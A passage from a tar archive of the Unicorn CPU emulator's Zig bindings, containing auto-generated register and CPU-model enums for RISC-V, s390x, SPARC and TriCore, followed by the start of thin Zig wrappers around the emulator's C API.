PPC_REG_CTR = 76, PPC_REG_MSR = 77, PPC_REG_FPSCR = 78, PPC_REG_CR = 79, PPC_REG_ENDING = 80, }; ������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/bindings/zig/unicorn/riscv_const.zig��������������������������������������������������0000664�0000000�0000000�00000015106�14675241067�0022321�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������// For Unicorn Engine. 
AUTO-GENERATED FILE, DO NOT EDIT pub const riscvConst = enum(c_int) { // RISCV32 CPU CPU_RISCV32_ANY = 0, CPU_RISCV32_BASE32 = 1, CPU_RISCV32_SIFIVE_E31 = 2, CPU_RISCV32_SIFIVE_U34 = 3, CPU_RISCV32_ENDING = 4, // RISCV64 CPU CPU_RISCV64_ANY = 0, CPU_RISCV64_BASE64 = 1, CPU_RISCV64_SIFIVE_E51 = 2, CPU_RISCV64_SIFIVE_U54 = 3, CPU_RISCV64_ENDING = 4, // RISCV registers RISCV_REG_INVALID = 0, // General purpose registers RISCV_REG_X0 = 1, RISCV_REG_X1 = 2, RISCV_REG_X2 = 3, RISCV_REG_X3 = 4, RISCV_REG_X4 = 5, RISCV_REG_X5 = 6, RISCV_REG_X6 = 7, RISCV_REG_X7 = 8, RISCV_REG_X8 = 9, RISCV_REG_X9 = 10, RISCV_REG_X10 = 11, RISCV_REG_X11 = 12, RISCV_REG_X12 = 13, RISCV_REG_X13 = 14, RISCV_REG_X14 = 15, RISCV_REG_X15 = 16, RISCV_REG_X16 = 17, RISCV_REG_X17 = 18, RISCV_REG_X18 = 19, RISCV_REG_X19 = 20, RISCV_REG_X20 = 21, RISCV_REG_X21 = 22, RISCV_REG_X22 = 23, RISCV_REG_X23 = 24, RISCV_REG_X24 = 25, RISCV_REG_X25 = 26, RISCV_REG_X26 = 27, RISCV_REG_X27 = 28, RISCV_REG_X28 = 29, RISCV_REG_X29 = 30, RISCV_REG_X30 = 31, RISCV_REG_X31 = 32, // RISCV CSR RISCV_REG_USTATUS = 33, RISCV_REG_UIE = 34, RISCV_REG_UTVEC = 35, RISCV_REG_USCRATCH = 36, RISCV_REG_UEPC = 37, RISCV_REG_UCAUSE = 38, RISCV_REG_UTVAL = 39, RISCV_REG_UIP = 40, RISCV_REG_FFLAGS = 41, RISCV_REG_FRM = 42, RISCV_REG_FCSR = 43, RISCV_REG_CYCLE = 44, RISCV_REG_TIME = 45, RISCV_REG_INSTRET = 46, RISCV_REG_HPMCOUNTER3 = 47, RISCV_REG_HPMCOUNTER4 = 48, RISCV_REG_HPMCOUNTER5 = 49, RISCV_REG_HPMCOUNTER6 = 50, RISCV_REG_HPMCOUNTER7 = 51, RISCV_REG_HPMCOUNTER8 = 52, RISCV_REG_HPMCOUNTER9 = 53, RISCV_REG_HPMCOUNTER10 = 54, RISCV_REG_HPMCOUNTER11 = 55, RISCV_REG_HPMCOUNTER12 = 56, RISCV_REG_HPMCOUNTER13 = 57, RISCV_REG_HPMCOUNTER14 = 58, RISCV_REG_HPMCOUNTER15 = 59, RISCV_REG_HPMCOUNTER16 = 60, RISCV_REG_HPMCOUNTER17 = 61, RISCV_REG_HPMCOUNTER18 = 62, RISCV_REG_HPMCOUNTER19 = 63, RISCV_REG_HPMCOUNTER20 = 64, RISCV_REG_HPMCOUNTER21 = 65, RISCV_REG_HPMCOUNTER22 = 66, RISCV_REG_HPMCOUNTER23 = 67, RISCV_REG_HPMCOUNTER24 = 68, RISCV_REG_HPMCOUNTER25 = 69, RISCV_REG_HPMCOUNTER26 = 70, RISCV_REG_HPMCOUNTER27 = 71, RISCV_REG_HPMCOUNTER28 = 72, RISCV_REG_HPMCOUNTER29 = 73, RISCV_REG_HPMCOUNTER30 = 74, RISCV_REG_HPMCOUNTER31 = 75, RISCV_REG_CYCLEH = 76, RISCV_REG_TIMEH = 77, RISCV_REG_INSTRETH = 78, RISCV_REG_HPMCOUNTER3H = 79, RISCV_REG_HPMCOUNTER4H = 80, RISCV_REG_HPMCOUNTER5H = 81, RISCV_REG_HPMCOUNTER6H = 82, RISCV_REG_HPMCOUNTER7H = 83, RISCV_REG_HPMCOUNTER8H = 84, RISCV_REG_HPMCOUNTER9H = 85, RISCV_REG_HPMCOUNTER10H = 86, RISCV_REG_HPMCOUNTER11H = 87, RISCV_REG_HPMCOUNTER12H = 88, RISCV_REG_HPMCOUNTER13H = 89, RISCV_REG_HPMCOUNTER14H = 90, RISCV_REG_HPMCOUNTER15H = 91, RISCV_REG_HPMCOUNTER16H = 92, RISCV_REG_HPMCOUNTER17H = 93, RISCV_REG_HPMCOUNTER18H = 94, RISCV_REG_HPMCOUNTER19H = 95, RISCV_REG_HPMCOUNTER20H = 96, RISCV_REG_HPMCOUNTER21H = 97, RISCV_REG_HPMCOUNTER22H = 98, RISCV_REG_HPMCOUNTER23H = 99, RISCV_REG_HPMCOUNTER24H = 100, RISCV_REG_HPMCOUNTER25H = 101, RISCV_REG_HPMCOUNTER26H = 102, RISCV_REG_HPMCOUNTER27H = 103, RISCV_REG_HPMCOUNTER28H = 104, RISCV_REG_HPMCOUNTER29H = 105, RISCV_REG_HPMCOUNTER30H = 106, RISCV_REG_HPMCOUNTER31H = 107, RISCV_REG_MCYCLE = 108, RISCV_REG_MINSTRET = 109, RISCV_REG_MCYCLEH = 110, RISCV_REG_MINSTRETH = 111, RISCV_REG_MVENDORID = 112, RISCV_REG_MARCHID = 113, RISCV_REG_MIMPID = 114, RISCV_REG_MHARTID = 115, RISCV_REG_MSTATUS = 116, RISCV_REG_MISA = 117, RISCV_REG_MEDELEG = 118, RISCV_REG_MIDELEG = 119, RISCV_REG_MIE = 120, RISCV_REG_MTVEC = 121, RISCV_REG_MCOUNTEREN = 122, RISCV_REG_MSTATUSH = 123, 
RISCV_REG_MUCOUNTEREN = 124, RISCV_REG_MSCOUNTEREN = 125, RISCV_REG_MHCOUNTEREN = 126, RISCV_REG_MSCRATCH = 127, RISCV_REG_MEPC = 128, RISCV_REG_MCAUSE = 129, RISCV_REG_MTVAL = 130, RISCV_REG_MIP = 131, RISCV_REG_MBADADDR = 132, RISCV_REG_SSTATUS = 133, RISCV_REG_SEDELEG = 134, RISCV_REG_SIDELEG = 135, RISCV_REG_SIE = 136, RISCV_REG_STVEC = 137, RISCV_REG_SCOUNTEREN = 138, RISCV_REG_SSCRATCH = 139, RISCV_REG_SEPC = 140, RISCV_REG_SCAUSE = 141, RISCV_REG_STVAL = 142, RISCV_REG_SIP = 143, RISCV_REG_SBADADDR = 144, RISCV_REG_SPTBR = 145, RISCV_REG_SATP = 146, RISCV_REG_HSTATUS = 147, RISCV_REG_HEDELEG = 148, RISCV_REG_HIDELEG = 149, RISCV_REG_HIE = 150, RISCV_REG_HCOUNTEREN = 151, RISCV_REG_HTVAL = 152, RISCV_REG_HIP = 153, RISCV_REG_HTINST = 154, RISCV_REG_HGATP = 155, RISCV_REG_HTIMEDELTA = 156, RISCV_REG_HTIMEDELTAH = 157, // Floating-point registers RISCV_REG_F0 = 158, RISCV_REG_F1 = 159, RISCV_REG_F2 = 160, RISCV_REG_F3 = 161, RISCV_REG_F4 = 162, RISCV_REG_F5 = 163, RISCV_REG_F6 = 164, RISCV_REG_F7 = 165, RISCV_REG_F8 = 166, RISCV_REG_F9 = 167, RISCV_REG_F10 = 168, RISCV_REG_F11 = 169, RISCV_REG_F12 = 170, RISCV_REG_F13 = 171, RISCV_REG_F14 = 172, RISCV_REG_F15 = 173, RISCV_REG_F16 = 174, RISCV_REG_F17 = 175, RISCV_REG_F18 = 176, RISCV_REG_F19 = 177, RISCV_REG_F20 = 178, RISCV_REG_F21 = 179, RISCV_REG_F22 = 180, RISCV_REG_F23 = 181, RISCV_REG_F24 = 182, RISCV_REG_F25 = 183, RISCV_REG_F26 = 184, RISCV_REG_F27 = 185, RISCV_REG_F28 = 186, RISCV_REG_F29 = 187, RISCV_REG_F30 = 188, RISCV_REG_F31 = 189, RISCV_REG_PC = 190, RISCV_REG_ENDING = 191, // Alias registers RISCV_REG_ZERO = 1, RISCV_REG_RA = 2, RISCV_REG_SP = 3, RISCV_REG_GP = 4, RISCV_REG_TP = 5, RISCV_REG_T0 = 6, RISCV_REG_T1 = 7, RISCV_REG_T2 = 8, RISCV_REG_S0 = 9, RISCV_REG_FP = 9, RISCV_REG_S1 = 10, RISCV_REG_A0 = 11, RISCV_REG_A1 = 12, RISCV_REG_A2 = 13, RISCV_REG_A3 = 14, RISCV_REG_A4 = 15, RISCV_REG_A5 = 16, RISCV_REG_A6 = 17, RISCV_REG_A7 = 18, RISCV_REG_S2 = 19, RISCV_REG_S3 = 20, RISCV_REG_S4 = 21, RISCV_REG_S5 = 22, RISCV_REG_S6 = 23, RISCV_REG_S7 = 24, RISCV_REG_S8 = 25, RISCV_REG_S9 = 26, RISCV_REG_S10 = 27, RISCV_REG_S11 = 28, RISCV_REG_T3 = 29, RISCV_REG_T4 = 30, RISCV_REG_T5 = 31, RISCV_REG_T6 = 32, RISCV_REG_FT0 = 158, RISCV_REG_FT1 = 159, RISCV_REG_FT2 = 160, RISCV_REG_FT3 = 161, RISCV_REG_FT4 = 162, RISCV_REG_FT5 = 163, RISCV_REG_FT6 = 164, RISCV_REG_FT7 = 165, RISCV_REG_FS0 = 166, RISCV_REG_FS1 = 167, RISCV_REG_FA0 = 168, RISCV_REG_FA1 = 169, RISCV_REG_FA2 = 170, RISCV_REG_FA3 = 171, RISCV_REG_FA4 = 172, RISCV_REG_FA5 = 173, RISCV_REG_FA6 = 174, RISCV_REG_FA7 = 175, RISCV_REG_FS2 = 176, RISCV_REG_FS3 = 177, RISCV_REG_FS4 = 178, RISCV_REG_FS5 = 179, RISCV_REG_FS6 = 180, RISCV_REG_FS7 = 181, RISCV_REG_FS8 = 182, RISCV_REG_FS9 = 183, RISCV_REG_FS10 = 184, RISCV_REG_FS11 = 185, RISCV_REG_FT8 = 186, RISCV_REG_FT9 = 187, RISCV_REG_FT10 = 188, RISCV_REG_FT11 = 189, }; 
����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/bindings/zig/unicorn/s390x_const.zig��������������������������������������������������0000664�0000000�0000000�00000004734�14675241067�0022066�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������// For Unicorn Engine. AUTO-GENERATED FILE, DO NOT EDIT pub const s390xConst = enum(c_int) { // S390X CPU CPU_S390X_Z900 = 0, CPU_S390X_Z900_2 = 1, CPU_S390X_Z900_3 = 2, CPU_S390X_Z800 = 3, CPU_S390X_Z990 = 4, CPU_S390X_Z990_2 = 5, CPU_S390X_Z990_3 = 6, CPU_S390X_Z890 = 7, CPU_S390X_Z990_4 = 8, CPU_S390X_Z890_2 = 9, CPU_S390X_Z990_5 = 10, CPU_S390X_Z890_3 = 11, CPU_S390X_Z9EC = 12, CPU_S390X_Z9EC_2 = 13, CPU_S390X_Z9BC = 14, CPU_S390X_Z9EC_3 = 15, CPU_S390X_Z9BC_2 = 16, CPU_S390X_Z10EC = 17, CPU_S390X_Z10EC_2 = 18, CPU_S390X_Z10BC = 19, CPU_S390X_Z10EC_3 = 20, CPU_S390X_Z10BC_2 = 21, CPU_S390X_Z196 = 22, CPU_S390X_Z196_2 = 23, CPU_S390X_Z114 = 24, CPU_S390X_ZEC12 = 25, CPU_S390X_ZEC12_2 = 26, CPU_S390X_ZBC12 = 27, CPU_S390X_Z13 = 28, CPU_S390X_Z13_2 = 29, CPU_S390X_Z13S = 30, CPU_S390X_Z14 = 31, CPU_S390X_Z14_2 = 32, CPU_S390X_Z14ZR1 = 33, CPU_S390X_GEN15A = 34, CPU_S390X_GEN15B = 35, CPU_S390X_QEMU = 36, CPU_S390X_MAX = 37, CPU_S390X_ENDING = 38, // S390X registers S390X_REG_INVALID = 0, // General purpose registers S390X_REG_R0 = 1, S390X_REG_R1 = 2, S390X_REG_R2 = 3, S390X_REG_R3 = 4, S390X_REG_R4 = 5, S390X_REG_R5 = 6, S390X_REG_R6 = 7, S390X_REG_R7 = 8, S390X_REG_R8 = 9, S390X_REG_R9 = 10, S390X_REG_R10 = 11, S390X_REG_R11 = 12, S390X_REG_R12 = 13, S390X_REG_R13 = 14, S390X_REG_R14 = 15, S390X_REG_R15 = 16, // Floating point registers S390X_REG_F0 = 17, S390X_REG_F1 = 18, S390X_REG_F2 = 19, S390X_REG_F3 = 20, S390X_REG_F4 = 21, S390X_REG_F5 = 22, S390X_REG_F6 = 23, S390X_REG_F7 = 24, S390X_REG_F8 = 25, S390X_REG_F9 = 26, S390X_REG_F10 = 27, S390X_REG_F11 = 28, S390X_REG_F12 = 29, S390X_REG_F13 = 30, S390X_REG_F14 = 31, S390X_REG_F15 = 32, S390X_REG_F16 = 33, S390X_REG_F17 = 34, S390X_REG_F18 = 35, S390X_REG_F19 = 36, S390X_REG_F20 = 37, S390X_REG_F21 = 38, S390X_REG_F22 = 39, S390X_REG_F23 = 40, S390X_REG_F24 = 41, S390X_REG_F25 = 42, S390X_REG_F26 = 43, S390X_REG_F27 = 44, S390X_REG_F28 = 45, S390X_REG_F29 = 46, S390X_REG_F30 = 47, S390X_REG_F31 = 48, // Access registers S390X_REG_A0 = 49, S390X_REG_A1 = 50, S390X_REG_A2 = 51, S390X_REG_A3 = 52, S390X_REG_A4 = 53, S390X_REG_A5 = 54, S390X_REG_A6 = 55, S390X_REG_A7 = 56, S390X_REG_A8 = 57, S390X_REG_A9 = 58, S390X_REG_A10 = 59, S390X_REG_A11 = 60, S390X_REG_A12 = 61, S390X_REG_A13 = 62, S390X_REG_A14 = 63, S390X_REG_A15 = 64, S390X_REG_PC = 65, S390X_REG_PSWM = 66, S390X_REG_ENDING = 67, // Alias registers }; 
������������������������������������unicorn-2.1.1/bindings/zig/unicorn/sparc_const.zig��������������������������������������������������0000664�0000000�0000000�00000006071�14675241067�0022304�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������// For Unicorn Engine. AUTO-GENERATED FILE, DO NOT EDIT pub const sparcConst = enum(c_int) { // SPARC32 CPU CPU_SPARC32_FUJITSU_MB86904 = 0, CPU_SPARC32_FUJITSU_MB86907 = 1, CPU_SPARC32_TI_MICROSPARC_I = 2, CPU_SPARC32_TI_MICROSPARC_II = 3, CPU_SPARC32_TI_MICROSPARC_IIEP = 4, CPU_SPARC32_TI_SUPERSPARC_40 = 5, CPU_SPARC32_TI_SUPERSPARC_50 = 6, CPU_SPARC32_TI_SUPERSPARC_51 = 7, CPU_SPARC32_TI_SUPERSPARC_60 = 8, CPU_SPARC32_TI_SUPERSPARC_61 = 9, CPU_SPARC32_TI_SUPERSPARC_II = 10, CPU_SPARC32_LEON2 = 11, CPU_SPARC32_LEON3 = 12, CPU_SPARC32_ENDING = 13, // SPARC64 CPU CPU_SPARC64_FUJITSU = 0, CPU_SPARC64_FUJITSU_III = 1, CPU_SPARC64_FUJITSU_IV = 2, CPU_SPARC64_FUJITSU_V = 3, CPU_SPARC64_TI_ULTRASPARC_I = 4, CPU_SPARC64_TI_ULTRASPARC_II = 5, CPU_SPARC64_TI_ULTRASPARC_III = 6, CPU_SPARC64_TI_ULTRASPARC_IIE = 7, CPU_SPARC64_SUN_ULTRASPARC_III = 8, CPU_SPARC64_SUN_ULTRASPARC_III_CU = 9, CPU_SPARC64_SUN_ULTRASPARC_IIII = 10, CPU_SPARC64_SUN_ULTRASPARC_IV = 11, CPU_SPARC64_SUN_ULTRASPARC_IV_PLUS = 12, CPU_SPARC64_SUN_ULTRASPARC_IIII_PLUS = 13, CPU_SPARC64_SUN_ULTRASPARC_T1 = 14, CPU_SPARC64_SUN_ULTRASPARC_T2 = 15, CPU_SPARC64_NEC_ULTRASPARC_I = 16, CPU_SPARC64_ENDING = 17, // SPARC registers SPARC_REG_INVALID = 0, SPARC_REG_F0 = 1, SPARC_REG_F1 = 2, SPARC_REG_F2 = 3, SPARC_REG_F3 = 4, SPARC_REG_F4 = 5, SPARC_REG_F5 = 6, SPARC_REG_F6 = 7, SPARC_REG_F7 = 8, SPARC_REG_F8 = 9, SPARC_REG_F9 = 10, SPARC_REG_F10 = 11, SPARC_REG_F11 = 12, SPARC_REG_F12 = 13, SPARC_REG_F13 = 14, SPARC_REG_F14 = 15, SPARC_REG_F15 = 16, SPARC_REG_F16 = 17, SPARC_REG_F17 = 18, SPARC_REG_F18 = 19, SPARC_REG_F19 = 20, SPARC_REG_F20 = 21, SPARC_REG_F21 = 22, SPARC_REG_F22 = 23, SPARC_REG_F23 = 24, SPARC_REG_F24 = 25, SPARC_REG_F25 = 26, SPARC_REG_F26 = 27, SPARC_REG_F27 = 28, SPARC_REG_F28 = 29, SPARC_REG_F29 = 30, SPARC_REG_F30 = 31, SPARC_REG_F31 = 32, SPARC_REG_F32 = 33, SPARC_REG_F34 = 34, SPARC_REG_F36 = 35, SPARC_REG_F38 = 36, SPARC_REG_F40 = 37, SPARC_REG_F42 = 38, SPARC_REG_F44 = 39, SPARC_REG_F46 = 40, SPARC_REG_F48 = 41, SPARC_REG_F50 = 42, SPARC_REG_F52 = 43, SPARC_REG_F54 = 44, SPARC_REG_F56 = 45, SPARC_REG_F58 = 46, SPARC_REG_F60 = 47, SPARC_REG_F62 = 48, SPARC_REG_FCC0 = 49, SPARC_REG_FCC1 = 50, SPARC_REG_FCC2 = 51, SPARC_REG_FCC3 = 52, SPARC_REG_G0 = 53, SPARC_REG_G1 = 54, SPARC_REG_G2 = 55, SPARC_REG_G3 = 56, SPARC_REG_G4 = 57, SPARC_REG_G5 = 58, SPARC_REG_G6 = 59, SPARC_REG_G7 = 60, SPARC_REG_I0 = 61, SPARC_REG_I1 = 62, SPARC_REG_I2 = 63, SPARC_REG_I3 = 64, SPARC_REG_I4 = 65, SPARC_REG_I5 = 66, SPARC_REG_FP = 67, SPARC_REG_I7 = 68, SPARC_REG_ICC = 69, SPARC_REG_L0 = 70, SPARC_REG_L1 = 71, SPARC_REG_L2 = 72, SPARC_REG_L3 = 73, SPARC_REG_L4 = 74, SPARC_REG_L5 = 75, SPARC_REG_L6 = 76, SPARC_REG_L7 = 77, SPARC_REG_O0 = 78, SPARC_REG_O1 = 79, SPARC_REG_O2 = 80, SPARC_REG_O3 = 81, SPARC_REG_O4 = 82, SPARC_REG_O5 = 83, SPARC_REG_SP = 84, SPARC_REG_O7 = 85, SPARC_REG_Y = 86, SPARC_REG_XCC = 87, SPARC_REG_PC = 88, SPARC_REG_ENDING = 89, SPARC_REG_O6 = 84, SPARC_REG_I6 = 67, }; 
unicorn-2.1.1/bindings/zig/unicorn/tricore_const.zig

// For Unicorn Engine. AUTO-GENERATED FILE, DO NOT EDIT
pub const tricoreConst = enum(c_int) {
    // TRICORE CPU
    CPU_TRICORE_TC1796 = 0, CPU_TRICORE_TC1797 = 1, CPU_TRICORE_TC27X = 2, CPU_TRICORE_ENDING = 3,

    // TRICORE registers
    TRICORE_REG_INVALID = 0,
    TRICORE_REG_A0 = 1, TRICORE_REG_A1 = 2, TRICORE_REG_A2 = 3, TRICORE_REG_A3 = 4,
    TRICORE_REG_A4 = 5, TRICORE_REG_A5 = 6, TRICORE_REG_A6 = 7, TRICORE_REG_A7 = 8,
    TRICORE_REG_A8 = 9, TRICORE_REG_A9 = 10, TRICORE_REG_A10 = 11, TRICORE_REG_A11 = 12,
    TRICORE_REG_A12 = 13, TRICORE_REG_A13 = 14, TRICORE_REG_A14 = 15, TRICORE_REG_A15 = 16,
    TRICORE_REG_D0 = 17, TRICORE_REG_D1 = 18, TRICORE_REG_D2 = 19, TRICORE_REG_D3 = 20,
    TRICORE_REG_D4 = 21, TRICORE_REG_D5 = 22, TRICORE_REG_D6 = 23, TRICORE_REG_D7 = 24,
    TRICORE_REG_D8 = 25, TRICORE_REG_D9 = 26, TRICORE_REG_D10 = 27, TRICORE_REG_D11 = 28,
    TRICORE_REG_D12 = 29, TRICORE_REG_D13 = 30, TRICORE_REG_D14 = 31, TRICORE_REG_D15 = 32,
    TRICORE_REG_PCXI = 33, TRICORE_REG_PSW = 34,
    TRICORE_REG_PSW_USB_C = 35, TRICORE_REG_PSW_USB_V = 36, TRICORE_REG_PSW_USB_SV = 37,
    TRICORE_REG_PSW_USB_AV = 38, TRICORE_REG_PSW_USB_SAV = 39,
    TRICORE_REG_PC = 40, TRICORE_REG_SYSCON = 41, TRICORE_REG_CPU_ID = 42,
    TRICORE_REG_BIV = 43, TRICORE_REG_BTV = 44, TRICORE_REG_ISP = 45, TRICORE_REG_ICR = 46,
    TRICORE_REG_FCX = 47, TRICORE_REG_LCX = 48, TRICORE_REG_COMPAT = 49,
    TRICORE_REG_DPR0_U = 50, TRICORE_REG_DPR1_U = 51, TRICORE_REG_DPR2_U = 52, TRICORE_REG_DPR3_U = 53,
    TRICORE_REG_DPR0_L = 54, TRICORE_REG_DPR1_L = 55, TRICORE_REG_DPR2_L = 56, TRICORE_REG_DPR3_L = 57,
    TRICORE_REG_CPR0_U = 58, TRICORE_REG_CPR1_U = 59, TRICORE_REG_CPR2_U = 60, TRICORE_REG_CPR3_U = 61,
    TRICORE_REG_CPR0_L = 62, TRICORE_REG_CPR1_L = 63, TRICORE_REG_CPR2_L = 64, TRICORE_REG_CPR3_L = 65,
    TRICORE_REG_DPM0 = 66, TRICORE_REG_DPM1 = 67, TRICORE_REG_DPM2 = 68, TRICORE_REG_DPM3 = 69,
    TRICORE_REG_CPM0 = 70, TRICORE_REG_CPM1 = 71, TRICORE_REG_CPM2 = 72, TRICORE_REG_CPM3 = 73,
    TRICORE_REG_MMU_CON = 74, TRICORE_REG_MMU_ASI = 75, TRICORE_REG_MMU_TVA = 76, TRICORE_REG_MMU_TPA = 77,
    TRICORE_REG_MMU_TPX = 78, TRICORE_REG_MMU_TFA = 79,
    TRICORE_REG_BMACON = 80, TRICORE_REG_SMACON = 81,
    TRICORE_REG_DIEAR = 82, TRICORE_REG_DIETR = 83, TRICORE_REG_CCDIER = 84, TRICORE_REG_MIECON = 85,
    TRICORE_REG_PIEAR = 86, TRICORE_REG_PIETR = 87, TRICORE_REG_CCPIER = 88,
    TRICORE_REG_DBGSR = 89, TRICORE_REG_EXEVT = 90, TRICORE_REG_CREVT = 91, TRICORE_REG_SWEVT = 92,
    TRICORE_REG_TR0EVT = 93, TRICORE_REG_TR1EVT = 94, TRICORE_REG_DMS = 95, TRICORE_REG_DCX = 96,
    TRICORE_REG_DBGTCR = 97, TRICORE_REG_CCTRL = 98, TRICORE_REG_CCNT = 99,
    TRICORE_REG_ICNT = 100, TRICORE_REG_M1CNT = 101, TRICORE_REG_M2CNT = 102, TRICORE_REG_M3CNT = 103,
    TRICORE_REG_ENDING = 104,

    // Alias registers
    TRICORE_REG_GA0 = 1, TRICORE_REG_GA1 = 2, TRICORE_REG_GA8 = 9, TRICORE_REG_GA9 = 10,
    TRICORE_REG_SP = 11, TRICORE_REG_LR = 12, TRICORE_REG_IA = 16, TRICORE_REG_ID = 32,
};

unicorn-2.1.1/bindings/zig/unicorn/unicorn.zig

/// Public includes
// Architectures
pub const arm = @import("arm_const.zig");
pub const arm64 = @import("arm64_const.zig");
pub const m68k = @import("m68k_const.zig");
pub const mips = @import("mips_const.zig");
pub const ppc = @import("ppc_const.zig");
pub const riscv = @import("riscv_const.zig");
pub const tricore = @import("tricore_const.zig");
pub const sparc = @import("sparc_const.zig");
pub const s390x = @import("s390x_const.zig");
pub const x86 = @import("x86_const.zig");

// Unicorn consts
pub usingnamespace @import("unicorn_const.zig");

// C include
pub const c = @cImport(@cInclude("unicorn/unicorn.h"));

pub fn uc_version(major: [*c]c_uint, minor: [*c]c_uint) c_uint {
    return c.uc_version(major, minor);
}

pub fn uc_arch_supported(arch: c.uc_arch) bool {
    return c.uc_arch_supported(arch);
}

pub fn uc_open(arch: c.uc_arch, mode: c.uc_mode, uc: [*c]?*c.uc_engine) !void {
    try getErrors(c.uc_open(arch, mode, uc));
}

pub fn uc_close(uc: ?*c.uc_engine) !void {
    try getErrors(c.uc_close(uc));
}

pub fn uc_query(uc: ?*c.uc_engine, @"type": c.uc_query_type, result: [*c]usize) !void {
    try getErrors(c.uc_query(uc, @"type", result));
}

pub fn uc_ctl(uc: ?*c.uc_engine, control: c.uc_control_type) !void {
    try getErrors(c.uc_ctl(uc, control));
}

pub fn uc_errno(uc: ?*c.uc_engine) !void {
    try getErrors(c.uc_errno(uc));
}

pub fn uc_strerror(code: Error) [*:0]const u8 {
    return switch (code) {
        error.ucErrNoMemory => c.uc_strerror(c.UC_ERR_NOMEM),
        error.ucErrArch => c.uc_strerror(c.UC_ERR_ARCH),
        error.ucErrHandle => c.uc_strerror(c.UC_ERR_HANDLE),
        error.ucErrMode => c.uc_strerror(c.UC_ERR_MODE),
        error.ucErrVersion => c.uc_strerror(c.UC_ERR_VERSION),
        error.ucErrReadUnmapped => c.uc_strerror(c.UC_ERR_READ_UNMAPPED),
        error.ucErrWriteUnmapped => c.uc_strerror(c.UC_ERR_WRITE_UNMAPPED),
        error.ucErrFetchUnmapped => c.uc_strerror(c.UC_ERR_FETCH_UNMAPPED),
        error.ucErrHook => c.uc_strerror(c.UC_ERR_HOOK),
        error.ucErrInvalidInstruction => c.uc_strerror(c.UC_ERR_INSN_INVALID),
        error.ucErrMap => c.uc_strerror(c.UC_ERR_MAP),
        error.ucErrWriteProtected => c.uc_strerror(c.UC_ERR_WRITE_PROT),
        error.ucErrReadProtected => c.uc_strerror(c.UC_ERR_READ_PROT),
        error.ucErrFetchProtected => c.uc_strerror(c.UC_ERR_FETCH_PROT),
        error.ucErrInvalidArgument => c.uc_strerror(c.UC_ERR_ARG),
        error.ucErrReadUnaligned => c.uc_strerror(c.UC_ERR_READ_UNALIGNED),
        error.ucErrWriteUnaligned => c.uc_strerror(c.UC_ERR_WRITE_UNALIGNED),
        error.ucErrFetchUnaligned => c.uc_strerror(c.UC_ERR_FETCH_UNALIGNED),
        error.ucErrHookAlreadyExists => c.uc_strerror(c.UC_ERR_HOOK_EXIST),
        error.ucErrResource => c.uc_strerror(c.UC_ERR_RESOURCE),
        error.ucErrException => c.uc_strerror(c.UC_ERR_EXCEPTION),
    };
}

pub fn uc_reg_write(uc: ?*c.uc_engine, regid: c_int, value: ?*const anyopaque) !void {
    try getErrors(c.uc_reg_write(uc, regid, value));
}

pub fn uc_reg_read(uc: ?*c.uc_engine, regid: c_int, value: ?*anyopaque) !void {
    try getErrors(c.uc_reg_read(uc, regid, value));
}

pub fn uc_reg_write_batch(uc: ?*c.uc_engine, regs: [*c]c_int, vals: [*c]const ?*anyopaque, count: c_int) !void {
    try getErrors(c.uc_reg_write_batch(uc, regs, vals, count));
}

pub fn uc_reg_read_batch(uc: ?*c.uc_engine, regs: [*c]c_int, vals: [*c]?*anyopaque, count: c_int) !void {
    try getErrors(c.uc_reg_read_batch(uc, regs, vals, count));
}

pub fn uc_mem_write(uc: ?*c.uc_engine, address: u64, bytes: ?*const anyopaque, size: usize) !void {
    try getErrors(c.uc_mem_write(uc, address, bytes, size));
}

pub fn uc_mem_read(uc: ?*c.uc_engine, address: u64, bytes: ?*anyopaque, size: usize) !void {
    try getErrors(c.uc_mem_read(uc, address, bytes, size));
}

pub fn uc_emu_start(uc: ?*c.uc_engine, begin: u64, until: u64, timeout: u64, count: usize) !void {
    try getErrors(c.uc_emu_start(uc, begin, until, timeout, count));
}

pub fn uc_emu_stop(uc: ?*c.uc_engine) !void {
    try getErrors(c.uc_emu_stop(uc));
}

pub fn uc_hook_add(uc: ?*c.uc_engine, hh: [*c]c.uc_hook, @"type": c_int, callback: ?*anyopaque, user_data: ?*anyopaque, begin: u64, end: u64) !void {
    try getErrors(c.uc_hook_add(uc, hh, @"type", callback, user_data, begin, end));
}

pub fn uc_hook_del(uc: ?*c.uc_engine, hh: c.uc_hook) !void {
    try getErrors(c.uc_hook_del(uc, hh));
}

pub fn uc_mem_map(uc: ?*c.uc_engine, address: u64, size: usize, perms: u32) !void {
    try getErrors(c.uc_mem_map(uc, address, size, perms));
}

pub fn uc_mem_map_ptr(uc: ?*c.uc_engine, address: u64, size: usize, perms: u32, ptr: ?*anyopaque) !void {
    try getErrors(c.uc_mem_map_ptr(uc, address, size, perms, ptr));
}

pub fn uc_mmio_map(uc: ?*c.uc_engine, address: u64, size: usize, read_cb: c.uc_cb_mmio_read_t, user_data_read: ?*anyopaque, write_cb: c.uc_cb_mmio_write_t, user_data_write: ?*anyopaque) !void {
    try getErrors(c.uc_mmio_map(uc, address, size, read_cb, user_data_read, write_cb, user_data_write));
}

pub fn uc_mem_unmap(uc: ?*c.uc_engine, address: u64, size: usize) !void {
    try getErrors(c.uc_mem_unmap(uc, address, size));
}

pub fn uc_mem_protect(uc: ?*c.uc_engine, address: u64, size: usize, perms: u32) !void {
    try getErrors(c.uc_mem_protect(uc, address, size, perms));
}

pub fn uc_mem_regions(uc: ?*c.uc_engine, regions: [*c][*c]c.uc_mem_region, count: [*c]u32) !void {
    try getErrors(c.uc_mem_regions(uc, regions, count));
}

pub fn uc_context_alloc(uc: ?*c.uc_engine, context: [*c]?*c.uc_context) !void {
    try getErrors(c.uc_context_alloc(uc, context));
}

pub fn uc_free(mem: ?*anyopaque) !void {
    try getErrors(c.uc_free(mem));
}

pub fn uc_context_save(uc: ?*c.uc_engine, context: ?*c.uc_context) !void {
    try getErrors(c.uc_context_save(uc, context));
}

pub fn uc_context_reg_write(ctx: ?*c.uc_context, regid: c_int, value: ?*const anyopaque) !void {
